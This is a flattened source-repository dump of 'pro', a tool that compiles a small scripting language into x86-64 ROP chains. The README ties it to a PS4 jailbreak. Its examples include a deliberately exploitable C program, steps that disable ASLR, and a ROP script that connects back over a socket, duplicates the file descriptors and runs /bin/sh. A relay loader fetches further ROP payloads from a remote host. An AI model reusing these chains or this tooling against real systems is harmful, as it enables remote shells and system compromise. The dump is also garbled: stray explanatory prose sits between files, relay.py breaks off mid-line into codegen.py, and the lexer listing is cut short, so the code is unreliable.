├── pro ├── __init__.py ├── render.py ├── parse │ ├── pro.tokens │ ├── proLexer.tokens │ ├── proErrorListener.py │ ├── pro.g4 │ ├── proVisitor.py │ ├── proLexer.py │ ├── __init__.py │ └── proParser.py ├── ropchain.py └── codegen.py ├── .gitignore ├── examples ├── relay │ ├── README.md │ ├── main.pro │ ├── loader.pro │ ├── relay.pro │ └── relay.py ├── toy │ ├── toy.c │ ├── README.md │ ├── toy.pro │ └── toy.py └── common │ ├── glibc.pro │ └── gadgets.pro ├── setup.py └── README.md /pro/__init__.py: -------------------------------------------------------------------------------- 1 | from .render import * 2 | from .parse import * 3 | from .codegen import * 4 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | .*.swp 2 | .DS_Store 3 | *.pyc 4 | peda-*.txt 5 | core 6 | .gdb_history 7 | pro.egg-info/ 8 | -------------------------------------------------------------------------------- /examples/relay/README.md: -------------------------------------------------------------------------------- 1 | set up the same environment as for `toy` 2 | 3 | generate a ROP loader and send it to the victim program 4 | 5 | ```shell 6 | python relay.py 7 | ../toy/toy < ./loader 8 | ``` 9 | 10 | then edit `main.pro` to ROP interactively 11 | -------------------------------------------------------------------------------- /examples/toy/toy.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <stdlib.h> 3 | #include <unistd.h> 4 | 5 | #define SIZE 0x4000 6 | 7 | int main() 8 | { 9 | char *ropbuf = malloc(SIZE); 10 | read(0, ropbuf, SIZE); 11 | asm volatile ("mov %0, %%rsp\nret\n"::"m"(ropbuf)); 12 | } 13 | -------------------------------------------------------------------------------- /examples/relay/main.pro: -------------------------------------------------------------------------------- 1 | main { 2 | {% include "gadgets.pro" %} 3 | {% include "glibc.pro" %} 4 | printf("this is main!\n"); 5 | printf("this is main again!\n"); 6 | nop(); // stack alignment is fixed automatically 7 | printf("this is main again and again!\n"); 8 | // put relay at the end of main 9 | {% include "relay.pro" %} 10 | printf("bye\n"); 11 | exit(0); 12 | } 13 | -------------------------------------------------------------------------------- /examples/toy/README.md: -------------------------------------------------------------------------------- 1 | set up the environment (Ubuntu 16.04) 2 | ```shell 3 | gcc toy.c -o toy 4 | ulimit -s unlimited 5 | echo 0 > /proc/sys/kernel/randomize_va_space 6 | ``` 7 | 8 | listen on port 0x4141 (16705) 9 | ```shell 10 | nc -lvv 16705 11 | ``` 12 | 13 | generate the ROP chain and send it to the victim program 14 | ```shell 15 | python toy.py | ./toy 16 | ``` 17 | 18 | you should now have a shell 19 | -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | import os 2 | from setuptools import setup 3 | 4 | # quick and dirty build for antlr 5 | os.system('which antlr4 && cd pro/parse && antlr4 -no-listener -visitor -Dlanguage=Python2 pro.g4') 6 | 7 | setup( 8 | name='pro', 9 | version='1.0', 10 | description='PROgramming ROP like a PRO', 11 | packages=['pro', 'pro.parse'], 12 | install_requires=[ 13 | 'jinja2', 14 | 'antlr4-python2-runtime', 15 | ], 16 | ) 17 | --------------------------------------------------------------------------------
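Both example chains hand `connect()` a raw, pre-built `struct sockaddr_in` blob instead of calling a libc helper to construct it: the toy chain embeds one for port 0x4141 (the `nc -lvv 16705` listener above), and the relay example packs one for its RELAY_HOST/RELAY_PORT. Below is a minimal sketch of that 16-byte layout using only the standard `struct` module; the `sockaddr_in` helper name is ours and is not part of the repository.

```python
import struct

def sockaddr_in(host, port, family=2):
    # struct sockaddr_in on Linux/x86-64: u16 family (2 = AF_INET, little-endian
    # on these targets), u16 port in network byte order, 4-byte IPv4 address,
    # then 8 bytes of zero padding, 16 bytes in total.
    return (struct.pack('<H', family) +
            struct.pack('>H', port) +
            bytes(bytearray(int(b) for b in host.split('.'))) +
            b'\x00' * 8)

# port 0x4141 == 16705; address 0.0.0.0 gives the byte pattern the toy chain embeds
assert sockaddr_in('0.0.0.0', 0x4141) == b'\x02\x00\x41\x41' + b'\x00' * 12
```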
/examples/relay/loader.pro: -------------------------------------------------------------------------------- 1 | relay { 2 | {% include "gadgets.pro" %} 3 | {% include "glibc.pro" %} 4 | // setup connection 5 | var ropserver; 6 | socket(AF_INET, SOCK_STREAM, 0); 7 | store_rdx_rax(&ropserver, undefined); 8 | array sock[{{ sockaddr(RELAY_HOST, RELAY_PORT) }}]; 9 | connect(ropserver, sock, 0x10) 10 | 11 | dprintf(ropserver, "hello, you are %d\n", ropserver); 12 | 13 | {% set RELAY_FD = 'ropserver' %} 14 | {% include "relay.pro" %} 15 | exit(0); 16 | } 17 | -------------------------------------------------------------------------------- /examples/toy/toy.pro: -------------------------------------------------------------------------------- 1 | toy { 2 | {% include "gadgets.pro" %} 3 | {% include "glibc.pro" %} 4 | var fd; 5 | socket(AF_INET, SOCK_STREAM, IPPROTO_IP); 6 | // avoid clobbering rax by setting the argument to `undefined` 7 | store_rdx_rax(&fd, undefined); 8 | printf("socket fd = %d\n", fd); 9 | array addr["\x02\x00\x41\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"]; 10 | connect(fd, addr, 0x10); 11 | {% for i in range(3): %} 12 | dup2(fd, {{i}}); 13 | {% endfor %} 14 | system("/bin/sh"); 15 | exit(1); 16 | } 17 | -------------------------------------------------------------------------------- /pro/render.py: -------------------------------------------------------------------------------- 1 | import os 2 | import jinja2 3 | 4 | def process(raw, path=[], **ctx): 5 | path.append('.') 6 | env = jinja2.Environment(loader=jinja2.FileSystemLoader(path), 7 | line_comment_prefix='//', comment_start_string='/*', 8 | comment_end_string='*/') 9 | template = env.from_string(raw) 10 | ctx.update(__builtins__) 11 | return template.render(MODULES=set(), **ctx) 12 | 13 | def process_file(script, path=[], **ctx): 14 | script_path = os.path.dirname(os.path.realpath(script)) 15 | path.append(script_path) 16 | with open(script) as f: 17 | return process(f.read(), path, **ctx) 18 | -------------------------------------------------------------------------------- /pro/parse/pro.tokens: -------------------------------------------------------------------------------- 1 | T__0=1 2 | T__1=2 3 | T__2=3 4 | T__3=4 5 | T__4=5 6 | T__5=6 7 | T__6=7 8 | T__7=8 9 | T__8=9 10 | T__9=10 11 | T__10=11 12 | T__11=12 13 | T__12=13 14 | T__13=14 15 | T__14=15 16 | T__15=16 17 | T__16=17 18 | T__17=18 19 | T__18=19 20 | T__19=20 21 | T__20=21 22 | T__21=22 23 | Identifier=23 24 | Constant=24 25 | Decimal=25 26 | Hexadecimal=26 27 | String=27 28 | Whitespace=28 29 | LineComment=29 30 | BlockComment=30 31 | '{'=1 32 | '}'=2 33 | ';'=3 34 | '\n'=4 35 | 'var'=5 36 | 'const'=6 37 | 'array'=7 38 | 'func'=8 39 | '('=9 40 | ')'=10 41 | '['=11 42 | ']'=12 43 | '<'=13 44 | ','=14 45 | '>'=15 46 | '+'=16 47 | '-'=17 48 | '*'=18 49 | '/'=19 50 | '^'=20 51 | '|'=21 52 | '&'=22 53 | -------------------------------------------------------------------------------- /pro/parse/proLexer.tokens: -------------------------------------------------------------------------------- 1 | T__0=1 2 | T__1=2 3 | T__2=3 4 | T__3=4 5 | T__4=5 6 | T__5=6 7 | T__6=7 8 | T__7=8 9 | T__8=9 10 | T__9=10 11 | T__10=11 12 | T__11=12 13 | T__12=13 14 | T__13=14 15 | T__14=15 16 | T__15=16 17 | T__16=17 18 | T__17=18 19 | T__18=19 20 | T__19=20 21 | T__20=21 22 | T__21=22 23 | Identifier=23 24 | Constant=24 25 | Decimal=25 26 | Hexadecimal=26 27 | String=27 28 | Whitespace=28 29 | LineComment=29 30 | BlockComment=30 31 | '{'=1 32 | '}'=2 33 | ';'=3 
34 | '\n'=4 35 | 'var'=5 36 | 'const'=6 37 | 'array'=7 38 | 'func'=8 39 | '('=9 40 | ')'=10 41 | '['=11 42 | ']'=12 43 | '<'=13 44 | ','=14 45 | '>'=15 46 | '+'=16 47 | '-'=17 48 | '*'=18 49 | '/'=19 50 | '^'=20 51 | '|'=21 52 | '&'=22 53 | -------------------------------------------------------------------------------- /pro/parse/proErrorListener.py: -------------------------------------------------------------------------------- 1 | import antlr4 2 | import sys 3 | 4 | class SyntaxError(Exception): 5 | pass 6 | 7 | class proErrorListener(antlr4.error.ErrorListener.ErrorListener): 8 | def __init__(self, src): 9 | super(proErrorListener, self).__init__() 10 | 11 | self.src = src 12 | 13 | def syntaxError(self, recognizer, offendingSymbol, line, column, msg, e): 14 | lines = self.src.split('\n') 15 | text = '' 16 | for i in xrange(line - 10, line + 10): 17 | if i >= 0 and i < len(lines): 18 | h = '+ ' if i != line else '> ' 19 | text += '%d: %s %s\n' % (i, h, lines[i]) 20 | sys.stderr.write(text) 21 | raise SyntaxError(msg) 22 | -------------------------------------------------------------------------------- /examples/relay/relay.pro: -------------------------------------------------------------------------------- 1 | {% include "gadgets.pro" %} 2 | {% include "glibc.pro" %} 3 | 4 | // tell the server to start 5 | write({{RELAY_FD}}, "START", 5); 6 | 7 | // read length of rop 8 | var roplen; 9 | read({{RELAY_FD}}, &roplen, 8); 10 | // dprintf({{RELAY_FD}}, "rop length = %x\n", roplen); 11 | 12 | // setup memory for rop 13 | var pivot; 14 | var ropbuf; 15 | mmap(0, roplen, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0); 16 | store_rdx_rax(&ropbuf, undefined); 17 | // dprintf({{RELAY_FD}}, "rop buffer = %p\n", ropbuf); 18 | write({{RELAY_FD}}, &ropbuf, 8); 19 | 20 | // read payload of rop 21 | read({{RELAY_FD}}, ropbuf, roplen); 22 | 23 | nop(); 24 | // stack pivoting 25 | store_rdx_rax(&pivot, set_rsp); 26 | inline(set_rsp, &pivot); // tricky: pivot twice 27 | -------------------------------------------------------------------------------- /examples/toy/toy.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import pro 3 | 4 | class MyCodeGen(pro.CodeGenAmd64): 5 | def store_reg_mem(self, reg, addr): 6 | if reg == 'rax': 7 | store_rdx_rax = self.prog.env['store_rdx_rax'] 8 | r = self.set_reg_imm('rdx', addr) 9 | r.append(store_rdx_rax) 10 | r.define |= {'rdx'} 11 | return r 12 | raise NotImplemented('store_reg_mem %s' % reg) 13 | 14 | if __name__ == '__main__': 15 | rendered = pro.process_file('toy.pro', path=['../common'], LIBC_VERSION='2.23') 16 | 17 | prog = pro.parse(rendered) 18 | 19 | gen = MyCodeGen(prog) 20 | libc_base = 0x00002aaaaacd3000 # 16.04 21 | # libc_base = 0x00002aaaaacd1000 # 15.10 22 | reloc = {'libc':libc_base, '_CODE':0x602010} # derandomized 23 | chain = gen.gen_chain(reloc) 24 | 25 | sys.stdout.write(chain) 26 | -------------------------------------------------------------------------------- /examples/common/glibc.pro: -------------------------------------------------------------------------------- 1 | {% if str(self) not in MODULES %} 2 | # {{self if MODULES.add(str(self)) else self}} 3 | const AF_INET(2) 4 | const SOCK_STREAM(1) 5 | const IPPROTO_IP(0) 6 | 7 | const PROT_NONE(0x0) 8 | const PROT_READ(0x1) 9 | const PROT_WRITE(0x2) 10 | const PROT_EXEC(0x4) 11 | const MAP_ANON(0x20) // linux 12 | const MAP_SHARED(0x1) 13 | const MAP_FIXED(0x10) 14 | const MAP_PRIVATE(0x2) 15 | 16 | {% if LIBC_VERSION == 
'2.23' %} 17 | 18 | func mmap 19 | func system 20 | func socket 21 | func connect 22 | func dup2 23 | func printf 24 | func exit 25 | func perror 26 | func dprintf 27 | func read 28 | func write 29 | 30 | {% elif LIBC_VERSION == '2.21' %} 31 | 32 | func mmap 33 | func system 34 | func socket 35 | func connect 36 | func dup2 37 | func printf 38 | func exit 39 | func perror 40 | func dprintf 41 | func read 42 | func write 43 | 44 | {% endif %} 45 | {% endif %} 46 | -------------------------------------------------------------------------------- /examples/common/gadgets.pro: -------------------------------------------------------------------------------- 1 | {% if str(self) not in MODULES %} 2 | # {{self if MODULES.add(str(self)) else self}} 3 | {% if LIBC_VERSION == '2.23' %} 4 | 5 | func nop ; 6 | 7 | func set_rax ; 8 | func set_rdi ; 9 | func set_rsi ; 10 | func set_rdx ; 11 | func set_rcx ; 12 | func set_r8 ; // pop r8 ; mov eax, 0x00000001 ; ret ; 13 | func set_r14 ; 14 | func set_rbx ; 15 | func set_rsp ; 16 | 17 | func store_rdx_rax ; 18 | func load_rax ; 19 | func mov_r9_r14_call_rbx ; 20 | 21 | {% elif LIBC_VERSION == '2.21' %} 22 | 23 | func nop ; 24 | 25 | func set_rax ; 26 | func set_rdi ; 27 | func set_rsi ; 28 | func set_rdx ; 29 | func set_rcx ; 30 | func set_r8 ; // pop r8 ; mov eax, 0x00000001 ; ret ; 31 | func set_r14 ; 32 | func set_r15 ; 33 | func set_rbx ; 34 | func set_rsp ; 35 | func set_rbp ; 36 | 37 | func store_rdx_rax ; 38 | func load_rax ; 39 | func mov_r9_r15_call_rbx ; 40 | 41 | {% endif %} 42 | {% endif %} 43 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PRO: PROgramming ROP like a PRO 2 | 3 | This is a crappy tool used in our private PS4 jailbreak. Since some firmware version, the internal browser has been compiled WITHOUT JIT support, and sys\_jitshm\_xxx seems to be disabled for unprivileged processes. We have to write the kernel exploitation in ROP, as was done in the HENKaku jailbreak. 4 | 5 | ## Build 6 | 7 | ```shell 8 | pip install git+https://github.com/chaitin/pro 9 | ``` 10 | 11 | If you have modified the `pro.g4` file, use the following command to 12 | regenerate the lexer and parser. 13 | 14 | ```shell 15 | cd pro/parse && antlr4 -no-listener -visitor -Dlanguage=Python2 pro.g4 16 | ``` 17 | 18 | ## Examples 19 | 20 | ```javascript 21 | toy { 22 | {% include "gadgets.pro" %} 23 | {% include "glibc.pro" %} 24 | const AF_INET(2); 25 | const SOCK_STREAM(1); 26 | const IPPROTO_IP(0); 27 | var fd; 28 | socket(AF_INET, SOCK_STREAM, IPPROTO_IP); 29 | func store_rdx_rax; 30 | store_rdx_rax(&fd, undefined); 31 | printf("socket fd = %d\n", fd); 32 | array addr["\x02\x00\x41\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"]; 33 | connect(fd, addr, 0x10); 34 | {% for i in range(3): %} 35 | dup2(fd, {{i}}); 36 | {% endfor %} 37 | system("/bin/sh"); 38 | exit(1); 39 | } 40 | 41 | ``` 42 | 43 | ## Usage 44 | 45 | A BIG TODO. Just try it and learn by yourself. 46 | 47 | ## Quick Guide 48 | 49 | All expressions are evaluated at compile time; Const/Func must 50 | be initialized in their declarations. 51 | 52 | Func is initialized with `<Base, Offset, Signature>`. Base/Offset is used for 53 | relocation; Signature determines the calling convention of the Func. 54 | 55 | Array can be declared with a size (Int) or directly initialized with its content (String). 56 | 57 | For loops should be written as template directives; they are rendered before compilation.
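For instance, the `dup2` loop from the example above expands into three ordinary call statements before the parser ever sees the script. A minimal sketch of that rendering stage with stock Jinja2 (the real `pro.render.process` additionally enables `//` line comments and `/* */` block comments and passes in the `MODULES` set used by the includes; `trim_blocks` here is only for tidy output):

```python
import jinja2

template = """{% for i in range(3) %}
dup2(fd, {{ i }});
{% endfor %}"""

print(jinja2.Template(template, trim_blocks=True).render())
# dup2(fd, 0);
# dup2(fd, 1);
# dup2(fd, 2);
```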
For more information, check 59 | [Jinja2](http://jinja.pocoo.org/). 60 | 61 | -------------------------------------------------------------------------------- /pro/parse/pro.g4: -------------------------------------------------------------------------------- 1 | grammar pro; 2 | 3 | program 4 | : Identifier '{' statement* '}' 5 | ; 6 | 7 | statement 8 | : call_statement 9 | | declaration 10 | | delimiter 11 | ; 12 | 13 | delimiter 14 | : ';' 15 | | '\n' 16 | ; 17 | 18 | declaration 19 | : type_specifier Identifier initializer? 20 | ; 21 | 22 | type_specifier 23 | : 'var' 24 | | 'const' 25 | | 'array' 26 | | 'func' 27 | ; 28 | 29 | initializer 30 | : expression_initializer 31 | | array_initializer 32 | | func_initializer 33 | ; 34 | 35 | expression_initializer 36 | : '(' expression ')' 37 | ; 38 | 39 | array_initializer 40 | : '[' expression ']' 41 | ; 42 | 43 | func_initializer 44 | : '<' Identifier (',' Constant (',' String)?)? '>' 45 | ; 46 | 47 | call_statement 48 | : Identifier '(' arguments? ')' 49 | ; 50 | 51 | arguments 52 | : expression 53 | | arguments ',' expression 54 | ; 55 | 56 | expression 57 | : primary_expression 58 | | binary_expression 59 | | unary_expression 60 | ; 61 | 62 | binary_expression 63 | : primary_expression binary_operator primary_expression 64 | ; 65 | 66 | unary_expression 67 | : unary_operator primary_expression 68 | ; 69 | 70 | binary_operator 71 | : '+' 72 | | '-' 73 | | '*' 74 | | '/' 75 | | '^' 76 | | '|' 77 | | '&' 78 | ; 79 | 80 | unary_operator 81 | : '&' 82 | ; 83 | 84 | primary_expression 85 | : Identifier 86 | | Constant 87 | | String 88 | | '(' expression ')' 89 | ; 90 | 91 | Identifier 92 | : Nondigit (Nondigit | Digit)* 93 | ; 94 | 95 | Constant 96 | : Decimal 97 | | Hexadecimal 98 | ; 99 | 100 | Decimal 101 | : '-'? Digit+ 102 | ; 103 | 104 | Hexadecimal 105 | : '-'? '0' ('x' | 'X') Hexdigit+ 106 | ; 107 | 108 | String 109 | : '"' Char_sequence? '"' 110 | ; 111 | 112 | fragment 113 | Char_sequence 114 | : Char+ 115 | ; 116 | 117 | fragment 118 | Char 119 | : ~["\\] 120 | | Escape_sequence 121 | ; 122 | 123 | fragment 124 | Nondigit 125 | : [a-zA-Z_] 126 | ; 127 | 128 | fragment 129 | Digit 130 | : [0-9] 131 | ; 132 | 133 | fragment 134 | Hexdigit 135 | : [0-9a-fA-F] 136 | ; 137 | 138 | fragment 139 | Escape_sequence 140 | : '\\' ["n\\] 141 | | '\\x' Hexdigit+ 142 | ; 143 | 144 | Whitespace 145 | : [ \t]+ 146 | -> skip 147 | ; 148 | 149 | LineComment 150 | : ('//' | '#') ~[\r\n]* 151 | -> skip 152 | ; 153 | 154 | BlockComment 155 | : '/*' .*? '*/' 156 | -> skip 157 | ; 158 | -------------------------------------------------------------------------------- /pro/parse/proVisitor.py: -------------------------------------------------------------------------------- 1 | # Generated from pro.g4 by ANTLR 4.5.2 2 | from antlr4 import * 3 | 4 | # This class defines a complete generic visitor for a parse tree produced by proParser. 5 | 6 | class proVisitor(ParseTreeVisitor): 7 | 8 | # Visit a parse tree produced by proParser#program. 9 | def visitProgram(self, ctx): 10 | return self.visitChildren(ctx) 11 | 12 | 13 | # Visit a parse tree produced by proParser#statement. 14 | def visitStatement(self, ctx): 15 | return self.visitChildren(ctx) 16 | 17 | 18 | # Visit a parse tree produced by proParser#delimiter. 19 | def visitDelimiter(self, ctx): 20 | return self.visitChildren(ctx) 21 | 22 | 23 | # Visit a parse tree produced by proParser#declaration. 
24 | def visitDeclaration(self, ctx): 25 | return self.visitChildren(ctx) 26 | 27 | 28 | # Visit a parse tree produced by proParser#type_specifier. 29 | def visitType_specifier(self, ctx): 30 | return self.visitChildren(ctx) 31 | 32 | 33 | # Visit a parse tree produced by proParser#initializer. 34 | def visitInitializer(self, ctx): 35 | return self.visitChildren(ctx) 36 | 37 | 38 | # Visit a parse tree produced by proParser#expression_initializer. 39 | def visitExpression_initializer(self, ctx): 40 | return self.visitChildren(ctx) 41 | 42 | 43 | # Visit a parse tree produced by proParser#array_initializer. 44 | def visitArray_initializer(self, ctx): 45 | return self.visitChildren(ctx) 46 | 47 | 48 | # Visit a parse tree produced by proParser#func_initializer. 49 | def visitFunc_initializer(self, ctx): 50 | return self.visitChildren(ctx) 51 | 52 | 53 | # Visit a parse tree produced by proParser#call_statement. 54 | def visitCall_statement(self, ctx): 55 | return self.visitChildren(ctx) 56 | 57 | 58 | # Visit a parse tree produced by proParser#arguments. 59 | def visitArguments(self, ctx): 60 | return self.visitChildren(ctx) 61 | 62 | 63 | # Visit a parse tree produced by proParser#expression. 64 | def visitExpression(self, ctx): 65 | return self.visitChildren(ctx) 66 | 67 | 68 | # Visit a parse tree produced by proParser#binary_expression. 69 | def visitBinary_expression(self, ctx): 70 | return self.visitChildren(ctx) 71 | 72 | 73 | # Visit a parse tree produced by proParser#unary_expression. 74 | def visitUnary_expression(self, ctx): 75 | return self.visitChildren(ctx) 76 | 77 | 78 | # Visit a parse tree produced by proParser#binary_operator. 79 | def visitBinary_operator(self, ctx): 80 | return self.visitChildren(ctx) 81 | 82 | 83 | # Visit a parse tree produced by proParser#unary_operator. 84 | def visitUnary_operator(self, ctx): 85 | return self.visitChildren(ctx) 86 | 87 | 88 | # Visit a parse tree produced by proParser#primary_expression. 
89 | def visitPrimary_expression(self, ctx): 90 | return self.visitChildren(ctx) 91 | 92 | 93 | -------------------------------------------------------------------------------- /pro/ropchain.py: -------------------------------------------------------------------------------- 1 | from collections import defaultdict 2 | 3 | from .parse import Address 4 | 5 | class RopChainError(Exception): 6 | pass 7 | 8 | class Marker(object): 9 | pass 10 | 11 | class RopChain(list): 12 | def __init__(self, *args): 13 | super(RopChain, self).__init__(*args) 14 | 15 | self.define = set() 16 | self.reserve = set() 17 | 18 | def __add__(self, other): 19 | return RopChunk([self, other]) 20 | 21 | def fix(self): 22 | ''' try to resolve Marker ''' 23 | for i in xrange(len(self)): 24 | if isinstance(self[i], Marker): 25 | for j in xrange(len(self)): 26 | if self[j] == id(self[i]): 27 | # find match 28 | self[i] = Address('self', j * 8) 29 | break 30 | 31 | def final(self): 32 | ''' rebase `self` to `code` ''' 33 | self.fix() 34 | for g in self: 35 | if isinstance(g, Marker): 36 | raise RopChainError('unresolved marker') 37 | elif isinstance(g, Address) and g.base == 'self': 38 | g.base = '_CODE' 39 | return self 40 | 41 | def extends(self, other): 42 | ''' concat with another RopChain and rebase it''' 43 | offset = len(self) * 8 44 | other.fix() 45 | for i in xrange(len(other)): 46 | o = other[i] 47 | if isinstance(o, Address) and o.base == 'self': 48 | o.offset += offset 49 | self.append(o) 50 | 51 | if 'all' in other.define: 52 | self.define = {'all'} 53 | else: 54 | self.define |= other.define 55 | 56 | if 'all' in other.reserve: 57 | self.reserve = {'all'} 58 | else: 59 | self.reserve |= other.reserve 60 | 61 | return self 62 | 63 | @property 64 | def size(self): 65 | return len(self) * 8 66 | 67 | class RopChunk(list): 68 | def compact(self): 69 | n = len(self) 70 | D = [0] * n 71 | M = defaultdict(set) 72 | for i in xrange(n): 73 | u = self[i] 74 | for j in xrange(n): 75 | if i == j: 76 | continue 77 | v = self[j] 78 | if (u.define & v.reserve) or ('all' in v.reserve): 79 | # u should be in front of v 80 | M[i].add(j) 81 | D[j] += 1 82 | 83 | compacted = RopChain() 84 | 85 | for i in xrange(n): 86 | try: 87 | u = D.index(0) 88 | D[u] = -1 89 | except ValueError: 90 | raise RopChainError('failed to build ropchain') 91 | 92 | compacted.extends(self[u]) 93 | 94 | for v in M[u]: 95 | D[v] -= 1 96 | 97 | compacted.fix() 98 | compacted.define = set() 99 | compacted.reserve = set() 100 | 101 | return compacted 102 | 103 | @property 104 | def size(): 105 | return sum((x.size for x in self)) 106 | -------------------------------------------------------------------------------- /examples/relay/relay.py: -------------------------------------------------------------------------------- 1 | import pro 2 | 3 | import struct 4 | import pwn 5 | 6 | def sockaddr(host, port, family=2): 7 | raw = struct.pack('H', port) + ''.join(map(chr, map(int, host.split('.')))) + '\x00' * 8 8 | return '"' + raw.encode('string-escape') + '"' 9 | 10 | class MyCodeGen(pro.CodeGenAmd64): 11 | def store_reg_mem(self, reg, addr): 12 | if reg == 'rax': 13 | store_rdx_rax = self.prog.env['store_rdx_rax'] 14 | r = self.set_reg_imm('rdx', addr) 15 | r.append(store_rdx_rax) 16 | r.define |= {'rdx'} 17 | return r 18 | raise NotImplemented('store_reg_mem %s' % reg) 19 | 20 | def set_reg_imm(self, reg, imm): 21 | if reg == 'r9': 22 | if 'mov_r9_r14_call_rbx' in self.prog.env: 23 | mov_r9_r14_call_rbx = self.prog.env['mov_r9_r14_call_rbx'] 24 | set_rbx = 
self.prog.env['set_rbx'] 25 | return self.gen_call(pro.Call(mov_r9_r14_call_rbx, [imm, set_rbx])) 26 | elif 'mov_r9_r15_call_rbx' in self.prog.env: 27 | mov_r9_r15_call_rbx = self.prog.env['mov_r9_r15_call_rbx'] 28 | set_rbx = self.prog.env['set_rbx'] 29 | return self.gen_call(pro.Call(mov_r9_r15_call_rbx, [imm, set_rbx])) 30 | return super(MyCodeGen, self).set_reg_imm(reg, imm) 31 | 32 | def compile(script): 33 | rendered = pro.process_file(script, path=['../common'], **globals()) 34 | # print rendered 35 | prog = pro.parse(rendered) 36 | return MyCodeGen(prog) 37 | 38 | if __name__ == '__main__': 39 | # libc_base = 0x00002aaaaacd1000 # 15.10 40 | libc_base = 0x00002aaaaacd3000 # 16.04 41 | reloc = {'libc':libc_base, '_CODE':0x602010} # derandomized 42 | 43 | # LIBC_VERSION = '2.21' 44 | LIBC_VERSION = '2.23' 45 | RELAY_HOST = '127.0.0.1' 46 | RELAY_PORT = 12345 47 | listener = pwn.tubes.listen.listen(RELAY_PORT) 48 | 49 | with open('loader', 'w') as payload: 50 | chain = compile('loader.pro').gen_chain(reloc) 51 | payload.write(chain) 52 | 53 | # reserve for stack usage 54 | reserve = 0x400 55 | 56 | r = listener.wait_for_connection() 57 | d = r.recvline().strip() 58 | RELAY_FD = int(d.split(' ')[-1]) 59 | print 'relay fd = %d' % RELAY_FD 60 | 61 | while True: 62 | pwn.context.log_level = 'DEBUG' 63 | try: 64 | r.recvuntil('START') 65 | except EOFError: 66 | break 67 | 68 | pwn.context.log_level = 'INFO' 69 | raw_input('GO') 70 | 71 | x = compile('main.pro') 72 | 73 | # calculate rop size in a dry run 74 | rop = x.gen_chain(reloc) 75 | ropsize = len(rop) 76 | ropsize += reserve 77 | print 'length of next rop = %#x' % ropsize 78 | 79 | r.send(struct.pack('= 0 and (offset + v.size) <= env.size): 54 | raise CodeGenError('inconsitent variable size') 55 | for i in xrange(v.size / 8): 56 | data[offset / 8 + i] = val[i] 57 | return data 58 | 59 | def gen_code(self, statements): 60 | chain = RopChain() 61 | for stmt in statements: 62 | c = self.gen_call(stmt) 63 | c.define = set() 64 | c.reserve = set() 65 | chain.extends(c) 66 | return chain.final() 67 | 68 | def concretize(self, chain, reloc=None): 69 | # adjust function call which requires stack alignment 70 | for i in xrange(len(chain)): 71 | if isinstance(chain[i], Func) and chain[i].align: 72 | if not '_CODE' in reloc: 73 | raise CodeGenError('base of .code is required for stack aligment') 74 | if (reloc['_CODE'] + i * 8) % 0x10 == 0: 75 | # no need for alignment 76 | continue 77 | nop = self.prog.env['nop'] 78 | if chain[i + 1] != nop: 79 | raise CodeGenError('no nop for stack alignment') 80 | # swap their order 81 | chain[i + 1] = chain[i] 82 | chain[i] = nop 83 | 84 | return map(lambda x:self._concretize(x, reloc), chain) 85 | 86 | def flatten(self, chain, reloc=None): 87 | return ''.join(map(lambda x: struct.pack(' 6: 187 | raise CodeGenError('only support 6 arguments') 188 | reg = ['rdi', 'rsi', 'rdx', 'rcx', 'r8', 'r9'][k] 189 | r = self.set_reg(reg, arg) 190 | r.reserve = {reg} 191 | return r 192 | 193 | def gen_call_epilog(self, argc): 194 | return RopChain() 195 | 196 | def set_reg_imm(self, reg, imm): 197 | reg_setter = 'set_' + reg 198 | if reg_setter not in self.prog.env: 199 | raise CodeGenError('gadget "%s" is required' % reg_setter) 200 | gadget = self.prog.env[reg_setter] 201 | r = RopChain([gadget, imm]) 202 | if gadget.clobber is not None: 203 | r.define |= set(gadget.clobber) 204 | if gadget.output is not None: 205 | r.define |= set(gadget.clobber) 206 | return r 207 | 208 | def load_reg_mem(self, reg, addr): 209 | # XXX 
load registers by RAX 210 | if reg == 'rax': 211 | load_rax = self.prog.env['load_rax'] # mov rax, qword ptr [rax] 212 | r = self.set_reg_imm(reg, addr) 213 | r.append(load_rax) 214 | r.define = {'rax'} 215 | return r 216 | else: 217 | dst = Marker() 218 | r = self.ptrcpy(dst, addr).extends(self.set_reg_imm(reg, id(dst))) 219 | return r 220 | 221 | def store_reg_mem(self, reg, addr): 222 | # XXX store registers in RAX 223 | if reg == 'rax': 224 | store_rdi_rax = self.prog.env['store_rdi_rax'] # mov qword ptr [rdi], rax 225 | r = self.set_reg_imm('rdi', addr) 226 | r.append(store_rdi_rax) 227 | r.define |= {'rdi'} # rdi is overwritten 228 | return r 229 | raise NotImplementedError('store_reg_mem %s' % reg) 230 | 231 | def ptrcpy(self, dest, src): 232 | r = self.load_reg_mem('rax', src).extends(self.store_reg_mem('rax', dest)) 233 | return r 234 | -------------------------------------------------------------------------------- /pro/parse/proLexer.py: -------------------------------------------------------------------------------- 1 | # Generated from pro.g4 by ANTLR 4.5.2 2 | # encoding: utf-8 3 | from __future__ import print_function 4 | from antlr4 import * 5 | from io import StringIO 6 | 7 | 8 | def serializedATN(): 9 | with StringIO() as buf: 10 | buf.write(u"\3\u0430\ud6d1\u8206\uad2d\u4417\uaef1\u8d80\uaadd\2") 11 | buf.write(u" \u00e5\b\1\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4") 12 | buf.write(u"\7\t\7\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r") 13 | buf.write(u"\t\r\4\16\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22") 14 | buf.write(u"\4\23\t\23\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4") 15 | buf.write(u"\30\t\30\4\31\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35") 16 | buf.write(u"\t\35\4\36\t\36\4\37\t\37\4 \t \4!\t!\4\"\t\"\4#\t#\4") 17 | buf.write(u"$\t$\4%\t%\3\2\3\2\3\3\3\3\3\4\3\4\3\5\3\5\3\6\3\6\3") 18 | buf.write(u"\6\3\6\3\7\3\7\3\7\3\7\3\7\3\7\3\b\3\b\3\b\3\b\3\b\3") 19 | 